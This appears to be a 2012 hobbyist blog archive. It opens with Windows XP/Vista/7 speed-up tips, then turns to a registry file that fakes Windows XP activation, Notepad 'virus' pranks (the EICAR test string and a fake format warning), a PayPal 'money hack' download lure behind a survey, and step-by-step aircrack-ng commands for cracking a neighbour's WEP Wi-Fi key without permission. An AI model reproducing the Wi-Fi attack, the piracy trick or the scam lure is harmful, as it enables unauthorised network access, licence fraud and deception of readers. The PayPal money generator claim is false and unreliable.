Thursday 22 November 2012

Speed Up Windows XP Vista 7


Speed Up Windows XP Vista 7

To increase speed of computer, do change the settings, operating system windows. Here is a setting that must be done:
1. Disable the Sound Scheme (for Win XPVista7)
This method can be applied to Windows XPVista7Howpress START - Control Panel -Sounds and Audio Devices - Sounds - Sound scheme - No Sounds - Apply - OK.
Sound Scheme
2. Time to display startup and recovery (for Win XPVista7)
This method can be applied to Windows XPVista7Howpress START - Control Panel -System - Advanced - Startup and Recovery - Settings - System startup
  • Time to display list of operating systems            = 30 seconds, changed to = 1 seconds
  • Time to display recovery options when needed = 30 seconds, changed to = 5 seconds
Time to display startup and recovery
3. Performance Options (for Win XPVista7)
This method can be applied to Windows XPVista7Howpress START - Control Panel -System - Advanced - Performance - Settings - Visual Effects - Let windows choose what's best for my computer, changed to - Adjust for best performance - Apply - OK
Performance Options
For Win XP
START - Control Panel - Display - Appearance - Windows and buttons - from Windows Classic style - changed to Windows XP style - Apply. Then, click Effects - remove all check - OK - OK.
Windows XP style
For Win 7
Right click on desktop - Personalization - select themes
Aero themes
4. Delete all Scheduled Tasks (for Win XPVista7)
This method can be applied to Windows XPVista7Howpress START - Control Panel - Scheduled Tasks - delete all Scheduled Tasks
Scheduled Tasks
5. System Configuration Utility, Startup and Services (for Win XPVista7)
This method can be applied to Windows XPVista7. How, press START - run - msconfig - OK
msconfig
Startuponly activate anti virusfor other programscan be disabled, if you think not required.
System Configuration Utility, Startup and Services
Services: only activate anti virus, for other programs, can be disabled, if you think not required.
System Configuration Utility, Startup and Services
When finished, do the restart.
6. ConservativeSwapFileUsage=1 (for Windows XP)
This method can be applied to Windows XP. How, press START - run - msconfig - OK
ConservativeSwapFileUsage=1
SYSTEM.INI - click [386enh] - New - write: ConservativeSwapFileUsage=1 - Apply - OK
7. Window Metrics - MinAnimate=1 (for Windows XP)
This method can be applied to Windows XP. How, press START - run - regedit - OK
Window Metrics - MinAnimate=1
HKEY_CURRENT_USER - Control Panel - Desktop - WindowMetrics - MinAnimate -  Value data=1 - OK - restart.
8. Disk Cleanup for all drives (for Win XPVista7)
This method can be applied to Windows XPVista7. How, right click drive C - Properties -Disk Cleanup - give a check all items. Thenclick More Options - System Restore - Cleanup - Yes - OKRepeat process to drive D, EF.
Disk Cleanup
9. Check disk for all drives (for Win XPVista7)
This method can be applied to Windows XPVista7. How, right click drive C - Properties -Tools - Error checking - Check now - give a check all items (automatically fix file system errors, and scan for and attempt recovery of bad sectors) - Start. Repeat process to driveD, EF.
Check disk
10. Disk Defragmenter (for Win XPVista7)
This method can be applied to Windows XPVista7. How, right click drive C - Properties -Tools - Defragmentation - Defragment Now - select drive - Defragment. Repeat process todrive D, EF.
Disk Defragmenter
11. Delete installed programs, that you no longer use (for Win XPVista7)
This method can be applied to Windows XPVista7
Add or Remove Programs
12. Download and install CCleaner free (support Win XPVista7)
Download and install CCleaner 
Cleaner: Internet Explorer, Windows Explorer, System, Advanced

Registry Cleaner
13. Turn ReadyBoost (for Windows 7)
ReadyBoost can speed up your computer by using, USB flash drives and memory cards. 
  1. Plug a flash drive into your computer.
  2. In the Autoplay, under General options, click Speed up my system.
  3. Right click a flash drive - Properties - ReadyBoost, and then do one of the following:
  • Dedicate this device to ReadyBoost : to use the maximum available space on the flash drive for ReadyBoost. Windows will leave any files already stored on the device, but it'll use the rest to boost your system speed.
  • Use this device : to use less than the maximum available space on the device for ReadyBoost, and then move the slider to choose the amount of available space on the device you want to use.
     4. Click OK. 
ReadyBoost

Wednesday 21 November 2012

MAKE Genuine Windows XP By a Naotepd


For Making Genuine Windows XP By a Naotepd, please follow the procedure below.
1. Right click on desktop
Click New -->> Text Document.
2. Double click on New text document
3. Copy the following code below and paste into the new text document.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-7450093-23464"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35, 35,32,37,34,2d,36,34,30,2d,\
37,34,35,30,30,39,33,2d,32,33,34,36,34,00,2e,00,00 ,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,62,fc,61,4c,e0,26,33,16 ,05,d3,54,e7,a0,de,00,00,\
00,00,00,00,49,36,c2,49,20,47,0c,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,33,33,35,30,30,00 ,00,00,00,00,00,00,65,10,\
00,00,74,99,dd,b0,f7,07,00,00,98,10,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ,c4,ae,d6,1c
"LicenseInfo"=hex:e7,77,18,19,f8,08,fc,7d,e8,f0,df ,12,6e,46,cb,3f,ad,b2,dd,b9,\
15,18,16,c0,bc,c3,6a,7d,4a,80,8b,31,13,37,5a,78,a2 ,06,c8,6b,b9,d9,dd,cc,6a,\
9c,c5,9b,77,aa,07,8d,56,6a,7c,e4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,f d

4. Now click File-->> Save as..
5. Select file type All Files and save it by this name "Any name.reg". 

6. After double click on your saved file (Any name.reg), asking you "are you sure?" Tell It Yes.
7. See your windows XP is Genuine.

HOW TO CREATE VIRUS BY NOTEPAD


HOW TO CREATE VIRUS BY NOTEPAD


For making a notepad virus, please follow the procedure below. Right click on desktop Click New -->> Text Document. Double click on New text document Copy the following code below and past into the new text document. 



X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* Virus can be made by saving 
it.&nbs...



HOW TO CREATE VIRUS WITH NOTEPAD

For creating a virus with notepad, please follow the procedure below. Right click on desktop Click New -->> Text Document. Double click on New text document Copy the following code below and paste into the new text document. lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk 

after system reboot",20,"Warning") Now save it by..

lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")

Tuesday 20 November 2012

Bank Account Hacking


Bank Account Hacking


  How to Hack Paypal Money Amount
 How to Hack Paypal Money Amount
 How Its Work :
Just follow the simple steps and grab your Free PayPal Money Hack Generator
STEP 1 - Download “Paypal Money Hack ” Tool by clicking the Download Button Below :
STEP 2 - Save this Paypal Money hack Generator Tool on your desktop and open it.
STEP 3 - Enter Your paypal Email and Select how much amount you want to Hack and click on hack Button.
Click on graphic to begin downloading

How to Download
1. Click the Download button above to go to Download Page.
2. On download page, Select ‘Regular Download’. A survey will appear to
verify that you are a human and not a bot, this is to protect the number
of file downloads, which is 1000. So we are only offering this tool
to the first 1000 visitors. Simply fill in a short free survey and
then download the file.
Paypal , Paypal Hack , Paypal Money Hack , Paypal Hack Download , Free Paypal Money , Free Paypal Money Hack , Paypal Verified , Paypal Money Generator , Paypal Hack 2010 , Paypal Hack 2011 , Paypal Hack Software , Paypal Account Hack , Hack , Paypal , Paypal Money Hack Download , Paypal Money Adder , Paypal Verification , How To Hack Paypal , Paypal Hack Program , Verify Paypal Hack , Real Paypal Hack , Paypal Database Hack , Paypal Chargeback , Paypal Money Adder,Paypal Hacker 2008,Paypal Money Stealer By TheproHaxor,Turkey Paypal Hack,Paypal Money Amount Changer,Paypal Data Base,Paypal Hack V1.02,Paypal Hack V2.1,Paypal Hacking Tool Are You Earn Money

How to hack wifi security key.



How to hack wifi security key.

                             

 Watch And Send YourComment



How to Break into Wi-Fi Security Key (WAP/WEP)When you are seeing      some   wi-fi signal on your neighbourhood city and you have a laptop then what will you think?.Don’t you feel like “I wish I could some how break the password and dive into the deep oceans of the information” I believe everyone should be able to have free internet. If someday I make it big enough and I’ll be having ample money.. I promise I’ll provide free wifi hotspots all over the places.. “Let there be INTERNET”.. even If I don’t get rich.. I’ll become a politician and would make Internet a Fundemental right to every citizen.. Now that would be something..
That’s enough with the Castles in the air.. now lets get back to reality..
What I can do for you right now is that I can tell you how to hack a wifi network to access Internet.. Some would call it stealing.. some like me won’t..
I’ll call it Sharing.. Sharing is what on which the whole Internet is build upon…

SO HERE'S HOW WE DO IT:

    The two most common encryption types are:
       1) WEP
       2) WAP
        WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP i.e Wireless Application Protocol.

        WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas

       WAP is currently the most secure and best option to secure a wi-fi network..
It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.
Here I’ll tell you how to Crack WEP

      To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.
BackTrack have lots of preinstalled softwares for this very purpose..

The tools we will be using on Backtrack are:
1.         Kismet – a wireless network detector
2.         airodump – captures packets from a wireless router
3.         aireplay – forges ARP requests
4.         aircrack – decrypts the WEP keys
1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.

2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.

3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption.
Y=WEP N=OPEN 0=OTHER(usually WAP).

4) Once you find an access point, open a text document and paste in the
networks broadcast name (essid),
its mac address (bssid)
and its
channel number.
To get the above information, use the arrow keys to select an access point and hit to get more information about it.

5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:
airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]
In the above command airodump-ng starts the program,
the channel of your access point goes after -c ,
the file you wish to output the data goes after -w ,
and the MAC address of the access point goes after –bssid.
The command ends with the device name. Make sure to leave out the brackets.

6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]
In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. 
The 0 cites the delay between attacks, -a is the MAC address of the target access point,
-h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.
 7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack which in this case is packet injection,
-b is the MAC address of the target access point,
-h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.

 

 8) Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
In this comman
d the -a 1 forces the program into the WEP attack mode,
the -b is the targets MAC address,
and the -n 128 tells the program the WEP key length.
If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.